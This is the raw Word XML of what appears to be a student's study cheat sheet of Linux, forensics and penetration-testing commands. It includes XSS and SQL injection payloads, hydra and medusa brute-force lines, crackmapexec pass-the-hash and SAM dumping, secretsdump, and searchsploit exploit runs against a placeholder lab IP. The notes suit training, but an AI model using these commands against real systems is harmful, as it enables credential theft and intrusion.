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9B8DB" w14:textId="49EB5E89" w:rsidR="00D841C6" w:rsidRPr="00AD7813" w:rsidRDefault="00AD7813" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5"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Pr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5"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 xml:space="preserve">Main </w:t>
      </w:r>
      <w:r w:rsidR="003467DE" w:rsidRPr="00AD7813">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5"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Cyber Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0084EF" w14:textId="1153F28D" w:rsidR="00772D97" w:rsidRDefault="00772D97" w:rsidP="00772D9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4A9517" w14:textId="7F463C75" w:rsidR="00A716BA" w:rsidRPr="00A716BA" w:rsidRDefault="00A716BA" w:rsidP="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAD70C" w14:textId="43CCB13C" w:rsidR="00613EAF" w:rsidRDefault="00786159" w:rsidP="0069419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 – shows files and directories in my current location</w:t>
      </w:r>
      <w:r w:rsidR="0069419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A0D7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 -a – shows directories and hidden files</w:t>
      </w:r>
      <w:r w:rsidR="0069419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035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 -l – shows info on the dir and files like size</w:t>
      </w:r>
      <w:r w:rsidR="0080350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E035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r w:rsidR="0080350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E035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s</w:t>
      </w:r>
      <w:r w:rsidR="0069419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13EA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 -R – show recursively all the directories from my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F316D" w14:textId="20612B9E" w:rsidR="003B35C9" w:rsidRDefault="00F954CE" w:rsidP="003B35C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 rockyou.txt – print all the passes of files that contain the name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="003B3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B35C9" w:rsidRPr="003B3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find / -name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="003B3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for rockyou.txt file and shows the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21202C4F" w14:textId="61DCD294" w:rsidR="00772D97" w:rsidRDefault="00772D97" w:rsidP="003467D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 means super user do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE4388" w14:textId="752DD522" w:rsidR="00B31BEF" w:rsidRDefault="00B31BEF" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="right"/>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 </w:t>
      </w:r>
      <w:r w:rsidR="006749F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li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witch user</w:t>
      </w:r>
      <w:r w:rsidR="006749F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kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576E38F" w14:textId="5C12A380" w:rsidR="00E0359F" w:rsidRPr="00E0359F" w:rsidRDefault="00E0359F" w:rsidP="003467D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d – shows my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102059D" w14:textId="3503EDAF" w:rsidR="000A0D7F" w:rsidRDefault="000A0D7F" w:rsidP="00227792">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 - go to the first directory</w:t>
      </w:r>
      <w:r w:rsidR="0022779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 – go one directory back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32002FB3" w14:textId="0AFAC90C" w:rsidR="000A0D7F" w:rsidRDefault="00605A20" w:rsidP="003467D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ano asd.txt – edit a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079D1E" w14:textId="667621AC" w:rsidR="00605A20" w:rsidRDefault="00605A20"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  asd.txt</w:t>
      </w:r>
      <w:r w:rsidR="00406BD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int a file content</w:t>
      </w:r>
      <w:r w:rsidR="00406BD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at *.txt – enter all the text files</w:t>
      </w:r>
      <w:r w:rsidR="002D2B4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at -n f27 – print the file content and sign each line with its number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B68005" w14:textId="4E8D6836" w:rsidR="00EC2FA6" w:rsidRDefault="00EC2FA6"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k ‘{print $3}’ – print the third colum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print $NF}’ – print the last colum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print$(NF -1)}’ – print the second line from the en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print $1, $2, $3}’ – print the first 3 lines</w:t>
      </w:r>
      <w:r w:rsidR="00DD7D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F@ ‘{print $2}’ – separate all the lines where found @ and print the second column from all the columns.</w:t>
      </w:r>
      <w:r w:rsidR="00DD7D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length &gt; 7’ – prints all the lines that have more than 7 chars</w:t>
      </w:r>
      <w:r w:rsidR="008D40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NR == 111’ – print the line 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6A24F" w14:textId="5FAD9DD4" w:rsidR="00074A8B" w:rsidRDefault="00074A8B" w:rsidP="00A71BB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  -30 – prints the first 30 lines (the default is 10)</w:t>
      </w:r>
      <w:r w:rsidR="00A71B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l – print the last 10 lines</w:t>
      </w:r>
      <w:r w:rsidR="00A71B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ead -97 | tail -1 – print line number 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B98864" w14:textId="27FF0391" w:rsidR="00074A8B" w:rsidRDefault="00074A8B"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d ‘s/r/x/g’ – switch the char r in x in globall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ort – sort the ouput so identical words and number will shows togeth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uniq – delete </w:t>
      </w:r>
      <w:r w:rsidR="00D37B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acent words, that’s why have to come after sort</w:t>
      </w:r>
      <w:r w:rsidR="00D37B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niq -c - delete adjacent words and count how many duplicates</w:t>
      </w:r>
      <w:r w:rsidR="009529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niq -ic – delete adjacent words and count how many duplicates and ignore case sensitive</w:t>
      </w:r>
      <w:r w:rsidR="00D37B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ort -n – sort by number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D3FCD3" w14:textId="47CE1263" w:rsidR="008D404F" w:rsidRDefault="008D404F"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c -l – count number f lin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c -m/c – count number of chars or bytes, which is the s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c -w – counts the number of words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785BE66" w14:textId="1BA5F68C" w:rsidR="00D37B8F" w:rsidRPr="00074A8B" w:rsidRDefault="00D37B8F"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 ‘a-z’ ‘A-Z’ – replacing all the chars a-z in A-Z</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r ‘\t’ ‘\n’ – instead of tab go down a line </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF428D" w14:textId="77777777" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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 prints the current date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8DECF" w14:textId="77777777" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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config – prints the network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677AF15F" w14:textId="07BF9F1C" w:rsidR="00806014" w:rsidRDefault="00806014"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 – clear the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C64AD" w14:textId="0E58ECEA" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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kdir ddwd – creating a directoy called ddwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AC794" w14:textId="0B1843D8" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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ami – prints the current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CD889" w14:textId="1A1926A2" w:rsidR="00605A20" w:rsidRDefault="002F4F3E" w:rsidP="002F4F3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rm -f – remove a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rm -d – remove empty director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05A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rm -rd dddd – remove a</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empty</w:t>
      </w:r>
      <w:r w:rsidR="00605A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y ( r stands for recursive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7DDE8" w14:textId="77777777" w:rsidR="00605A20" w:rsidRDefault="00605A20"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 /home/kali/flag.txt /home/kali/Desktop – move the file from the first path to the other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6BE00" w14:textId="6E53D848" w:rsidR="00605A20" w:rsidRDefault="00605A20"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 /home/kali/flag.txt /home/kali/Desktop – copy the file from the first path and paste in the other path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04E50F" w14:textId="526F745B" w:rsidR="009163B0" w:rsidRDefault="009163B0"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time – output the amount of time and users logged since the last boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B670C8" w14:textId="2D29ECB3" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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passwd kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215E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ange password for the user kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215E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
    <w:p w14:paraId="5638866A" w14:textId="5D903E97" w:rsidR="005855F8" w:rsidRDefault="005855F8"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apt-get update – update the packag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apt-get upgrade – upgrade the packag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apt-get install cmatrix – install cmatrix package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ACB66F" w14:textId="61DBC323" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="00A716B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mod – change mode, change the permissions setting of a file.</w:t>
      </w:r>
      <w:r w:rsidR="00A716B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chmod +x file.sh – change the file permissions so we could run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AEF49" w14:textId="3A63E2A4" w:rsidR="00372529" w:rsidRDefault="00605A20" w:rsidP="00C11F4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hello" – prints “hello”</w:t>
      </w:r>
      <w:r w:rsidR="001368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cho “hello” &gt;&gt; file.txt – add the text in the file, if the file </w:t>
      </w:r>
      <w:r w:rsidR="001A42D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exist</w:t>
      </w:r>
      <w:r w:rsidR="001368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reates it</w:t>
      </w:r>
      <w:r w:rsidR="001368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cho “hello” &gt; file.txt - put the text in the file, if the file exist, it override it</w:t>
      </w:r>
      <w:r w:rsidR="00C11F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11F4F" w:rsidRPr="00C11F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e 'hello\nhello'</w:t>
      </w:r>
      <w:r w:rsidR="00C11F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o down a line</w:t>
      </w:r>
      <w:r w:rsid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72529" w:rsidRP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ho -e </w:t>
      </w:r>
      <w:r w:rsidR="000567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72529" w:rsidRP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1mexiting...\033[0m</w:t>
      </w:r>
      <w:r w:rsidR="000567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72529" w:rsidRP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old the text</w:t>
      </w:r>
      <w:r w:rsidR="00CA2A1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ho -e </w:t>
      </w:r>
      <w:r w:rsidR="000567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31mexiting...\033[0m</w:t>
      </w:r>
      <w:r w:rsid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e red text</w:t>
      </w:r>
      <w:r w:rsidR="00C11F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 – go down a line</w:t>
      </w:r>
      <w:r w:rsid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64C2" w:rsidRP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1m</w:t>
      </w:r>
      <w:r w:rsidR="00A664C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art bold text</w:t>
      </w:r>
      <w:r w:rsid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31m</w:t>
      </w:r>
      <w:r w:rsid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art red text</w:t>
      </w:r>
      <w:r w:rsid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C0698" w:rsidRP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0m</w:t>
      </w:r>
      <w:r w:rsid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 the text formatting to the terminal's default settings</w:t>
      </w:r>
      <w:r w:rsidR="00B839D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CB85727" w14:textId="7EF6AC6B" w:rsidR="006C60E7" w:rsidRPr="00361DDD" w:rsidRDefault="006C60E7" w:rsidP="00361DD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let “this is my project” – command to print</w:t>
      </w:r>
      <w:r w:rsidR="00B839D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rge text fo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tles</w:t>
      </w:r>
      <w:r w:rsidR="00361D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61DDD" w:rsidRPr="00361D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let -f slant "Forensic investigation"</w:t>
      </w:r>
      <w:r w:rsidR="00361D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nt the headline in slant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295BD4F" w14:textId="32FA77E5" w:rsidR="00136837" w:rsidRPr="00372529" w:rsidRDefault="00136837" w:rsidP="0013683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090E4F" w14:textId="1076D514" w:rsidR="00882BF3" w:rsidRDefault="00882BF3" w:rsidP="0013683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d5sum file.txt – calculate the md5 hash of the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ha1sum file.txt – calculate the sha1 hash of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764EB51" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69" w:rsidP="00502E6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service ssh start/stop/status – for start stop or check the status of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A44AE2" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69" w:rsidP="00502E6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get </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="008D369C">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downloads the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD9191" w14:textId="35F11E55" w:rsidR="00461CCA" w:rsidRDefault="00461CCA" w:rsidP="00502E6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lone http://github.com....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03433891" w14:textId="07F1201E" w:rsidR="00406BD8" w:rsidRDefault="00502E69" w:rsidP="00406BD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l – a command line tool that enables exchange between a device and a server through terminal.</w:t>
      </w:r>
      <w:r w:rsidR="00406BD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70284D" w14:textId="68FCD0E3" w:rsidR="009A2FE7" w:rsidRDefault="00502E69" w:rsidP="009A2FE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p “hello” – search for the word hell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i “hello” - search for the word hello without care for case sensitive</w:t>
      </w:r>
      <w:r w:rsidR="006554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v</w:t>
      </w:r>
      <w:r w:rsidR="00F218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3456</w:t>
      </w:r>
      <w:r w:rsidR="006554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clude </w:t>
      </w:r>
      <w:r w:rsidR="00F218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word or number that contains 123456</w:t>
      </w:r>
      <w:r w:rsidR="003A5B8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S’ – delete empty lines</w:t>
      </w:r>
      <w:r w:rsidR="006C752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w “hi” – search only for the word “hi” and not strings that contain “hi”</w:t>
      </w:r>
      <w:r w:rsid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E ‘^[0-9]+$’</w:t>
      </w:r>
      <w:r w:rsidR="006C752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584C" w:rsidRP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only lines that contain numbers</w:t>
      </w:r>
      <w:r w:rsid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R “hello” – search recursively in all the dir and files from the current path the word “hello”</w:t>
      </w:r>
      <w:r w:rsidR="00B106E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0858" w:rsidRPr="00C3085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p -Eo '([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])'</w:t>
      </w:r>
      <w:r w:rsidR="00C3085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nd only ip (maybe its not accurate)</w:t>
      </w:r>
      <w:r w:rsidR="002554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password\|pass\|pwd’ *.txt – search for every word here in the files</w:t>
      </w:r>
      <w:r w:rsidR="009A2F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I zip -B 8 – print 8 lines before the word</w:t>
      </w:r>
      <w:r w:rsidR="009A2F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I zip -A 8 – print 8 lines after the word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBC071" w14:textId="03AC78B5" w:rsidR="00E52D0A" w:rsidRPr="00E52D0A" w:rsidRDefault="00E52D0A" w:rsidP="000D0B2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stat -an</w:t>
      </w:r>
      <w:r w:rsidR="0005741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known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tat -tapn -</w:t>
      </w:r>
      <w:r w:rsidRPr="0062161E">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tat -planetu - known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both listening and non-listening socket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numerical addresses instead of resolving nam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only listening socket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TCP connection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UDP connection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the PID and name of the program to which each socket belong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xtended information, useful for extra details like user IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBC5E6" w14:textId="77777777" w:rsidR="002170DA" w:rsidRDefault="002170DA"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1CEF45" w14:textId="35806355" w:rsidR="002170DA" w:rsidRDefault="002170DA"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m http.server 8000 – open port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D645A9C" w14:textId="3ADFF5FB" w:rsidR="00B150B7" w:rsidRDefault="00C44632" w:rsidP="00B150B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h </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006028B0">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e@10.10.10.10</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nect using ssh to the machine 10.10.10.10 with joe user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA8D42" w14:textId="1EB1A542" w:rsidR="001D0E2C" w:rsidRDefault="001D0E2C" w:rsidP="00B150B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pass -p ‘kali’ ssh -o StrictHostKeyChecking=no</w:t>
      </w:r>
      <w:r w:rsidR="000104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000104DD" w:rsidRPr="00622BB2">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li@10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000104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map 8.8.8.8” -sV -oG /home/kali/Desktop/nmap.txt – using the password kali (-p) with user kali, and run nmap scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5ECC6" w14:textId="0E469831" w:rsidR="00B53A54" w:rsidRPr="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00987E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E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pass -p "$ssh_pass" scp /home/kali/Try.sh "$ssh_user"@"$ssh_ip":/home/"$ssh_us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transfer a file from first machine to the second machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B838C" w14:textId="76AE6DFA" w:rsidR="00C44632" w:rsidRDefault="00C44632"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 10.10.10.10 22 – connect port 22 (does not provide securit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c -lvp 30 – listening, verbose, port, listen to port 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA7C86" w14:textId="36E6DAEC" w:rsidR="009D0E12" w:rsidRDefault="009D0E12"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xsltproc all_nmap.xml &gt;&gt; nmap.html – convert xml to html (more readab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refox nmap.html</w:t>
      </w:r>
      <w:r w:rsidR="00800C8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pen html file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12609430" w14:textId="06A3ED78" w:rsidR="00980E0E" w:rsidRDefault="00E254BD" w:rsidP="00E254B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do </w:t>
      </w:r>
      <w:r w:rsidRPr="00E254B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ip -r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lo</w:t>
      </w:r>
      <w:r w:rsidRPr="00E254B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p "$first_location/$name_of_di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zip all the directories and files in the location provided and call the zip directory hello.zip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80E0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gunzip rockyou.txt.gz – open gz file</w:t>
      </w:r>
      <w:r w:rsidR="003D0EA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unzip filename – for open zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17692072" w14:textId="6A521865" w:rsidR="008D1514" w:rsidRDefault="008D1514"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n “hello” | sha1sum – it will convert the word “hello” to hash in type of sha1sum, the -n is for explicit to not go down for another line, for the hash to be accurate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386DF13" w14:textId="006A64F2" w:rsidR="00647E23" w:rsidRDefault="00647E23"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 ere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cho “hello $name” – “hello erel”, variables in terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C413D" w14:textId="709FBF46" w:rsidR="00634FC1" w:rsidRDefault="00634FC1" w:rsidP="00634FC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FC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va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sert the sentence of var variable into char in lower case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773D222" w14:textId="75E6A8E8" w:rsidR="00C37C9A" w:rsidRDefault="00C37C9A"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ile in $(ls); do echo “$file”; sleep 2; done – print the names of the files in the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FAC3F" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837"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walk harddisk.vmdk – shows us which files insid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inwalk -e harddisk.vmdk – extract files inside it can to, default directory name determined by the name of the file been carved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053913B" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837"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most harddisk.vmdk -T output – carve another type of file from binwalk tool, if not specified the name of output, the default name of the directory is “output”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7271E7" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837"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k_extractor</w:t>
      </w:r>
      <w:r w:rsidR="005E6F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6FE5" w:rsidRPr="005E6F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disk.vmdk</w:t>
      </w:r>
      <w:r w:rsidR="005E6F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bulk – has to specify output directory, bulk tool extract a lot of files and sometimes even pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12781870" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="005A3156"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s </w:t>
      </w:r>
      <w:r w:rsidRPr="005A315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disk.vmdk</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tract strings from the file, helpful with grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DB823" w14:textId="7E9AC4AD" w:rsidR="00B30837" w:rsidRDefault="00EA6EB0"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ftool file.elf – extract data on the file such original name and more, it may possible to change this data when loading the file to HxD and change there</w:t>
      </w:r>
      <w:r w:rsidR="00CD25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iftool car5.jpg -comment = “car” – add new tag</w:t>
      </w:r>
      <w:r w:rsidR="00CD25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iftool -csv photo.jpg &gt; extracted.csv – save the results to excel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ACA80D" w14:textId="46331C31" w:rsidR="0043317B" w:rsidRDefault="0043317B"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ghide embed -ef a.txt -cf b.txt – cover the file a.txt behind b.txt, ef (embedded file), cf (cover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teghide indo b.txt – show details on the file, maybe ask for passwor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teghide extract -sf b.txt – extract the hidden file behind b.txt, sf (secret file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650ADBCC" w14:textId="51E3B6C5" w:rsidR="00B02F1C" w:rsidRDefault="00B02F1C"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jar loader.jar – a command to open the burpsuite (need to run from the burpsuite directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACEACB" w14:textId="6ABF1CED" w:rsidR="00A503FD" w:rsidRDefault="00A503FD" w:rsidP="005832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cript&gt;alert(‘xss attack’)&lt;/script&gt; - script you can insert into input box of a site to see if sql injection works on it</w:t>
      </w:r>
      <w:r w:rsidR="00B369D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d for relational database</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D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t;SCRIPT&gt;alert(‘xss attack’)&lt;/SCRIPT&gt; - maybe they did not filtered big letters</w:t>
      </w:r>
      <w:r w:rsidR="005832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832B0" w:rsidRPr="005832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 FROM USERS WHERE username=1' OR '1'='1</w:t>
      </w:r>
      <w:r w:rsidR="005832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ql injection for extract all the users (works only if the table of the users called USERS, you can try also with USERNAME)</w:t>
      </w:r>
      <w:r w:rsidR="00A16B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ls – sql injection</w:t>
      </w:r>
      <w:r w:rsidR="004C174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t also possible to encode special characters and use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77579631" w14:textId="7D1CA11D" w:rsidR="00810F6C" w:rsidRDefault="00810F6C" w:rsidP="005832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map – tool that destined to extract data from DB</w:t>
      </w:r>
      <w:r w:rsidR="000042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qlmap -r ddd.txt -D dvwa -T users –dump – extract users and passwords from users table from DB called dvwa by using the exist file ddd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB0030" w14:textId="603E97B7" w:rsidR="00C4394F" w:rsidRDefault="00C4394F" w:rsidP="005832B0">
      <w:pPr>
        <w:jc w:val="right"/>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kto -h 10.10.10.10 – tool for pt in web, could extract data by exploit misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77EF6E" w14:textId="4D8F90C0" w:rsidR="00425FB7" w:rsidRDefault="00425FB7" w:rsidP="005832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b </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="006B41E2">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10.10.10.10/multi</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files and directories in this location using brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA0377" w14:textId="4EF149AF" w:rsidR="0036430B" w:rsidRDefault="00FD3637"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dra -l kali -p 1234 10.10.10.10 ssh – attack the ssh service on ip 10.10.10.10 with kali user and password 1234, L or P is for list of users or passwor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ydra -l malware -p 1 rdp://10.10.10.10 – attack the rdp port with malware user and password 1</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 for verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007E488" w14:textId="730E94E4" w:rsidR="00697594" w:rsidRDefault="0069759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usa -h 10.10.10.10 -u msfadmin -P /home/kali/file.txt -M ftp – use the user msfadmin with the password file to try brute force on ftp service on ip 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C04DF5" w14:textId="421232FD" w:rsidR="0036430B" w:rsidRDefault="0036430B"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m4linux 10.10.10.10 – tool that search info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12217076" w14:textId="376A7EFD" w:rsidR="00601862" w:rsidRDefault="00E45354" w:rsidP="00E45354">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35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C (Remote Procedure Cal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204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cclient -u “” -N 10.10.10.10  - try to connect to smb service with no username and no password, the flag -N means no passwor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pcclient -U “pentestme%Passw0rd\!” -c “queryuser Administrator” 10.10.10.10 – connect to ip 10.10.10.10 and run the command queryuser Administrator with the credentials pentestme as user and Passw0rd\! as password, (\ is for the special char ! to be recognized as part of the password), it retrieve info in administrator user.</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queryuser Administrator – it retrieve info in administrator user, could include user SID, and the groups </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member in</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numdomgroups – find the amount of groups in the system</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numdomusers – find the amount of users in the system</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6961B57" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE"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D8CF3" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE"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D1F580" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE"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736D1" w14:textId="3BF24614" w:rsidR="00FA06B9" w:rsidRDefault="00412636" w:rsidP="00726FC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ackmapexec – used mainly for pt, it’s </w:t>
      </w:r>
      <w:r w:rsidR="00C1032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ly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ost exploitation tool</w:t>
      </w:r>
      <w:r w:rsidR="00C1032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ld use also for exploi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263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enumerate information about network shar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can use it for run commands and more</w:t>
      </w:r>
      <w:r w:rsidR="00C8563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main functions of him is PtH (pass the hash) and PtT (pass the ticket)</w:t>
      </w:r>
      <w:r w:rsidR="00726FC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605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do crackmapexec smb 10.10.10.10 -u administrator -p 123456 </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605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credentials are right it will write “(pwn3d!)”</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crackmapexec smb 10.10.10.10 -u administrator -p 123456 --sam – give us the sam file of users and passwords</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crackmapexec smb 10.10.10.10 -u administrator -H ‘aasa…’  --shares – will use the has</w:t>
      </w:r>
      <w:r w:rsidR="000120D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password for get data on share directories</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crackmapexec smb 10.10.10.10 -u administrator -p 123456 -x ‘mkdir malware’ – create directory called “malware”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B1E0D" w14:textId="63CF967F" w:rsidR="00726FC1" w:rsidRDefault="00726FC1" w:rsidP="003C1974">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 flag for pass the has instead of passwor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x ‘mkdir malware’ – run command on the remote machine, in this example to create director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C1974" w:rsidRPr="003C197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 is used for extracting local account details from the SAM database on individual computers</w:t>
      </w:r>
      <w:r w:rsidR="008110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C1974" w:rsidRPr="003C197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ds</w:t>
      </w:r>
      <w:r w:rsidR="003C197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1974" w:rsidRPr="003C197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for extracting domain credentials from Active Directory domain controller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ares – extract info on share directori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oups – get data on the groups and the amount of users every group ha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oups startup – choose specific group, then we will get more data on the startup grou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80AAFCD" w14:textId="30ECCA5A" w:rsidR="00360534" w:rsidRDefault="00297646" w:rsidP="009C77E4">
      <w:pPr>
        <w:jc w:val="right"/>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ket-secretsdump -sam SAM.hive -secuirty SECURITY.hive -system SYSTEM.hive local – t</w:t>
      </w:r>
      <w:r w:rsidRPr="0029764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command extracts hashed passwords and  other sensitive security informa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w:t>
      </w:r>
      <w:r w:rsidRPr="0029764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uses the SYSTEM hive to decrypt the hashes found in the SAM hiv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w:t>
      </w:r>
      <w:r w:rsidRPr="0029764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an also extract and decrypt LSA Secrets if they are accessible within the SECURITY hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B685FBE" w14:textId="050487CB" w:rsidR="00F833E7" w:rsidRDefault="00F833E7"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sploit vsftpd – search all the exist exploits of vsftpd service in the DB exploit</w:t>
      </w:r>
      <w:r w:rsidR="00093FD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sploit -m 17491 – download the exploit file 17491 to our machine.</w:t>
      </w:r>
      <w:r w:rsidR="001418A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ython 4957.py 10.10.10.10 – use the exploit 4957.py in the target 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBBF25" w14:textId="77777777" w:rsidR="00697594" w:rsidRDefault="00697594"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AB629" w14:textId="6EEB9082" w:rsidR="00601862" w:rsidRPr="000C387E" w:rsidRDefault="00601862" w:rsidP="00601862">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atality commands in windows/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76388DC3" w14:textId="224F99B6" w:rsidR="00601862" w:rsidRPr="00A80D19" w:rsidRDefault="00601862"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atality - this tool can be used in windows and linux, the difference is vol.exe or ./vol</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used volatality 2.5 and 3</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exe -f memdump.mem imageinfo – get the OS (found in profile), we have to get that for the next comman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vol.exe -f memdump.mem </w:t>
      </w:r>
      <w:r w:rsid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inxpsp2 pstree</w:t>
      </w:r>
      <w:r w:rsid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the processes in </w:t>
      </w:r>
      <w:r w:rsidR="00933DDE" w:rsidRP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rarchy</w:t>
      </w:r>
      <w:r w:rsid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memdump.mem --profile=winxpsps2 pslist – print the procceses</w:t>
      </w:r>
      <w:r w:rsid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C50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 -f memdump.mem --profile=winxpsps2 mftparser – shows all the mft table</w:t>
      </w:r>
      <w:r w:rsidR="003E0F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memdump.mem --profile=winxpsps2 printkey -K “SAM\Domains\Account\Users\Names” – output all the users</w:t>
      </w:r>
      <w:r w:rsidR="003E0F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57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 -f memdump.mem --profile=winxpsps2 connscan – shows all the connection that’s has been on the computer</w:t>
      </w:r>
      <w:r w:rsidR="00A257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memdump.mem --profile=winxpsps2 connections – shows all the connections that wa active when the memory has been take</w:t>
      </w:r>
      <w:r w:rsidR="003907B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768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memdump.mem --profile=winxpsps2 cmdline\dlllist -p 788 – shows the path of the process</w:t>
      </w:r>
      <w:r w:rsidR="00B768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memdump.mem --profile=winxpsps2 hivelist</w:t>
      </w:r>
      <w:r w:rsidR="005017A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nt a list of all the registries</w:t>
      </w:r>
      <w:r w:rsidR="008D2D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dump2.mem –profile=vistasp1x86 hashdump – print the hashes of the users.</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atality 3 – a lil difference syntax</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info – output profile, as imageinfo on vol 2.5</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pslist – show  processes</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netscan.NetScan – shows connections</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envas – show computer name</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filescan – show a lot of paths of files, and its offsets</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dumpfiles --virtaddr 0x808 – extract a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D12BE" w14:textId="77777777" w:rsidR="00A80D19" w:rsidRPr="00933DDE" w:rsidRDefault="00A80D19"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6CFD8D" w14:textId="77777777" w:rsidR="0094127D" w:rsidRDefault="0094127D"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FBA3C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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8907D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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31F6A" w14:textId="41A9147F" w:rsidR="0094127D" w:rsidRPr="000C387E" w:rsidRDefault="0094127D" w:rsidP="0094127D">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any</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19709963" w14:textId="588FFB65" w:rsidR="00670C38" w:rsidRPr="00670C38" w:rsidRDefault="00670C38" w:rsidP="00670C3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bash – the first line in bash scipt, called shebang</w:t>
      </w:r>
